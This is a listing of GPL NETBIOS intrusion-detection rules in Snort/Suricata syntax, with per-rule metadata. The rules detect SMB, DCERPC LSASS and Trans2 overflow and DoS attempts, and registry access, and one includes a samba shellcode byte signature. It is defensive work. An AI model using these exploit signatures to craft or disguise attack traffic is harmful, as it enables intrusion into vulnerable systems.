Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102103

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB trans2open buffer overflow attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB2"; depth:5; offset:4; content:"|00 14|"; depth:2; offset:60; byte_test:2,>,256,0,relative,little; reference:bugtraq,7294; reference:cve,2003-0201; reference:url,www.digitaldefense.net/labs/advisories/DDI-1013.txt; classtype:attempted-admin; sid:2102103; rev:10; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB trans2open buffer overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,7294|cve,2003-0201|url,www.digitaldefense.net/labs/advisories/DDI-1013.txt

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 10

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102102

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB SMB_COM_TRANSACTION Max Data Count of 0 DOS Attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; content:"|00 00|"; depth:2; offset:45; reference:bugtraq,5556; reference:cve,2002-0724; reference:url,www.corest.com/common/showdoc.php?idx=262; reference:url,www.microsoft.com/technet/security/bulletin/MS02-045.mspx; reference:nessus,11110; classtype:denial-of-service; sid:2102102; rev:10; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB SMB_COM_TRANSACTION Max Data Count of 0 DOS Attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : denial-of-service

URL reference : bugtraq,5556|cve,2002-0724|url,www.corest.com/common/showdoc.php?idx=262|url,www.microsoft.com/technet/security/bulletin/MS02-045.mspx|nessus,11110

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 10

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102101

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB SMB_COM_TRANSACTION Max Parameter and Max Count of 0 DOS Attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; content:"|00 00 00 00|"; depth:4; offset:43; reference:bugtraq,5556; reference:cve,2002-0724; reference:nessus,11110; reference:url,www.corest.com/common/showdoc.php?idx=262; reference:url,www.microsoft.com/technet/security/bulletin/MS02-045.mspx; classtype:denial-of-service; sid:2102101; rev:12; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB SMB_COM_TRANSACTION Max Parameter and Max Count of 0 DOS Attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : denial-of-service

URL reference : bugtraq,5556|cve,2002-0724|nessus,11110|url,www.corest.com/common/showdoc.php?idx=262|url,www.microsoft.com/technet/security/bulletin/MS02-045.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 12

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102507

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC LSASS bind attempt"; flow:to_server,established; content:"|05|"; depth:1; content:"|00|"; within:1; distance:1; byte_test:1,&,1,0,relative; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102507; rev:8; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC LSASS bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,10108|cve,2003-0533|url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 8

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102508

#alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC LSASS DsRolerUpgradeDownlevelServer Exploit attempt"; flow:to_server,established; content:"|05|"; content:"|00|"; within:1; distance:1; content:"|09 00|"; within:2; distance:19; flowbits:isset,netbios.lsass.bind.attempt; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:attempted-admin; sid:2102508; rev:8; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC LSASS DsRolerUpgradeDownlevelServer Exploit attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,10108|cve,2003-0533|url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 8

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102509

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB DCERPC LSASS unicode bind attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; nocase; byte_test:2,&,1,5,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 05 00 0B|"; within:15; distance:4; byte_test:1,&,16,1,relative; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102509; rev:8; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB DCERPC LSASS unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,10108|cve,2003-0533|url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 8

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102510

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB DCERPC LSASS bind attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; nocase; byte_test:2,^,1,5,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00 05 00 0B|"; within:10; distance:4; byte_test:1,&,16,1,relative; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102510; rev:8; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB DCERPC LSASS bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,10108|cve,2003-0533|url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 8

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102511

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB DCERPC LSASS DsRolerUpgradeDownlevelServer exploit attempt"; flow:to_server,established; flowbits:isset,netbios.lsass.bind.attempt; content:"|FF|SMB"; depth:4; offset:4; nocase; content:"|05|"; distance:59; content:"|00|"; within:1; distance:1; content:"|09 00|"; within:2; distance:19; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:attempted-admin; sid:2102511; rev:10; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB DCERPC LSASS DsRolerUpgradeDownlevelServer exploit attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,10108|cve,2003-0533|url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 10

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102512

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC LSASS bind attempt"; flow:to_server,established; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00|"; within:12; distance:5; nocase; content:"|05|"; within:1; distance:2; content:"|0B|"; within:1; distance:1; byte_test:1,&,1,0,relative; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102512; rev:8; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS DCERPC LSASS bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,10108|cve,2003-0533|url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 8

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102513

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC LSASS unicode bind attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 05 00 0B|"; within:15; distance:4; byte_test:1,&,16,1,relative; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102513; rev:8; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS DCERPC LSASS unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,10108|cve,2003-0533|url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 8

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102514

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC LSASS DsRolerUpgradeDownlevelServer exploit attempt"; flow:to_server,established; flowbits:isset,netbios.lsass.bind.attempt; content:"|FF|SMB"; depth:4; offset:4; nocase; content:"|05|"; distance:59; content:"|00|"; within:1; distance:1; content:"|09 00|"; within:2; distance:19; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:attempted-admin; sid:2102514; rev:8; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS DCERPC LSASS DsRolerUpgradeDownlevelServer exploit attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,10108|cve,2003-0533|url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 8

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102524

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC LSASS direct bind attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB"; depth:4; offset:4; nocase; content:"|05|"; content:"|0B|"; within:1; distance:1; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102524; rev:8; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC LSASS direct bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,10108|cve,2003-0533|url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 8

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102525

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB DCERPC LSASS direct bind attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB"; depth:4; offset:4; nocase; content:"|05|"; content:"|0B|"; within:1; distance:1; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102525; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB DCERPC LSASS direct bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,10108|cve,2003-0533|url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102526

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC LSASS direct bind attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB"; depth:4; offset:4; nocase; content:"|05|"; content:"|0B|"; within:1; distance:1; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102526; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS DCERPC LSASS direct bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,10108|cve,2003-0533|url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102563

#alert udp $EXTERNAL_NET 137 -> $HOME_NET any (msg:"GPL NETBIOS NS lookup response name overflow attempt"; byte_test:1,>,127,2; content:"|00 01|"; depth:2; offset:6; byte_test:1,>,32,12; metadata: former_category NETBIOS; reference:bugtraq,10333; reference:bugtraq,10334; reference:cve,2004-0444; reference:cve,2004-0445; reference:url,www.eeye.com/html/Research/Advisories/AD20040512A.html; classtype:attempted-admin; sid:2102563; rev:6; metadata:created_at 2010_09_23, updated_at 2017_08_24;)

Name : NS lookup response name overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,10333|bugtraq,10334|cve,2004-0444|cve,2004-0445|url,www.eeye.com/html/Research/Advisories/AD20040512A.html

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2017-08-24

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103143

#alert tcp $HOME_NET 139 -> $EXTERNAL_NET any (msg:"GPL NETBIOS SMB Trans2 FIND_FIRST2 response overflow attempt"; flow:established,to_client; flowbits:isset,smb.trans2; content:"|00|"; depth:1; content:"|FF|SMB2"; within:5; distance:3; flowbits:unset,smb.trans2; byte_test:2,>,15,34,relative,little; reference:cve,2005-0045; reference:url,www.microsoft.com/technet/security/Bulletin/MS05-011.mspx; classtype:protocol-command-decode; sid:2103143; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB Trans2 FIND_FIRST2 response overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2005-0045|url,www.microsoft.com/technet/security/Bulletin/MS05-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103144

#alert tcp $HOME_NET 139 -> $EXTERNAL_NET any (msg:"GPL NETBIOS SMB Trans2 FIND_FIRST2 response andx overflow attempt"; flow:established,to_client; flowbits:isset,smb.trans2; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; content:"2"; depth:1; offset:39; byte_jump:2,0,little,relative; flowbits:unset,smb.trans2; byte_test:2,>,15,7,relative,little; reference:cve,2005-0045; reference:url,www.microsoft.com/technet/security/Bulletin/MS05-011.mspx; classtype:protocol-command-decode; sid:2103144; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB Trans2 FIND_FIRST2 response andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2005-0045|url,www.microsoft.com/technet/security/Bulletin/MS05-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103145

#alert tcp $HOME_NET 445 -> $EXTERNAL_NET any (msg:"GPL NETBIOS SMB-DS Trans2 FIND_FIRST2 response overflow attempt"; flow:established,to_client; flowbits:isset,smb.trans2; content:"|00|"; depth:1; content:"|FF|SMB2"; within:5; distance:3; flowbits:unset,smb.trans2; byte_test:2,>,15,34,relative,little; reference:cve,2005-0045; reference:url,www.microsoft.com/technet/security/Bulletin/MS05-011.mspx; classtype:protocol-command-decode; sid:2103145; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS Trans2 FIND_FIRST2 response overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2005-0045|url,www.microsoft.com/technet/security/Bulletin/MS05-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103146

#alert tcp $HOME_NET 445 -> $EXTERNAL_NET any (msg:"GPL NETBIOS SMB-DS Trans2 FIND_FIRST2 response andx overflow attempt"; flow:established,to_client; flowbits:isset,smb.trans2; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; content:"2"; depth:1; offset:39; byte_jump:2,0,little,relative; flowbits:unset,smb.trans2; byte_test:2,>,15,7,relative,little; reference:cve,2005-0045; reference:url,www.microsoft.com/technet/security/Bulletin/MS05-011.mspx; classtype:protocol-command-decode; sid:2103146; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS Trans2 FIND_FIRST2 response andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2005-0045|url,www.microsoft.com/technet/security/Bulletin/MS05-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103135

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB Trans2 QUERY_FILE_INFO attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB2"; within:5; distance:3; content:"|07 00|"; within:2; distance:56; flowbits:set,smb.trans2; flowbits:noalert; classtype:protocol-command-decode; sid:2103135; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB Trans2 QUERY_FILE_INFO attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103136

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB Trans2 QUERY_FILE_INFO andx attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; content:"2"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|07 00|"; within:2; distance:29; flowbits:set,smb.trans2; flowbits:noalert; classtype:protocol-command-decode; sid:2103136; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB Trans2 QUERY_FILE_INFO andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103137

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS Trans2 QUERY_FILE_INFO attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB2"; within:5; distance:3; content:"|07 00|"; within:2; distance:56; flowbits:set,smb.trans2; flowbits:noalert; classtype:protocol-command-decode; sid:2103137; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS Trans2 QUERY_FILE_INFO attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103138

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS Trans2 QUERY_FILE_INFO andx attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; content:"2"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|07 00|"; within:2; distance:29; flowbits:set,smb.trans2; flowbits:noalert; classtype:protocol-command-decode; sid:2103138; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS Trans2 QUERY_FILE_INFO andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103139

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB Trans2 FIND_FIRST2 attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB2"; within:5; distance:3; content:"|01 00|"; within:2; distance:56; flowbits:set,smb.trans2; flowbits:noalert; classtype:protocol-command-decode; sid:2103139; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB Trans2 FIND_FIRST2 attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103140

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB Trans2 FIND_FIRST2 andx attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; content:"2"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:29; flowbits:set,smb.trans2; flowbits:noalert; classtype:protocol-command-decode; sid:2103140; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB Trans2 FIND_FIRST2 andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103141

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS Trans2 FIND_FIRST2 attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB2"; within:5; distance:3; content:"|01 00|"; within:2; distance:56; flowbits:set,smb.trans2; flowbits:noalert; classtype:protocol-command-decode; sid:2103141; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS Trans2 FIND_FIRST2 attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2100292

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS x86 Linux samba overflow"; flow:to_server,established; content:"|EB|/_|EB|J^|89 FB 89|>|89 F2|"; reference:bugtraq,1816; reference:bugtraq,536; reference:cve,1999-0182; reference:cve,1999-0811; classtype:attempted-admin; sid:2100292; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : x86 Linux samba overflow

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1816|bugtraq,536|cve,1999-0182|cve,1999-0811

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2100686

alert tcp $EXTERNAL_NET any -> $SQL_SERVERS 1433 (msg:"GPL NETBIOS xp_reg* - registry access"; flow:to_server,established; content:"x|00|p|00|_|00|r|00|e|00|g|00|"; nocase; reference:bugtraq,5205; reference:cve,2002-0642; reference:nessus,10642; reference:url,www.microsoft.com/technet/security/bulletin/MS02-034; classtype:attempted-user; sid:2100686; rev:11; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : xp_reg — registry access*

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-user

URL reference : bugtraq,5205|cve,2002-0642|nessus,10642|url,www.microsoft.com/technet/security/bulletin/MS02-034

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 11

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2100689

alert tcp $EXTERNAL_NET any -> $SQL_SERVERS 139 (msg:"GPL NETBIOS xp_reg* registry access"; flow:to_server,established; content:"x|00|p|00|_|00|r|00|e|00|g|00|"; depth:32; offset:32; nocase; reference:bugtraq,5205; reference:cve,2002-0642; reference:nessus,10642; reference:url,www.microsoft.com/technet/security/bulletin/MS02-034; classtype:attempted-user; sid:2100689; rev:12; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : xp_reg registry access*

Attack target : Not defined

Description : Not defined

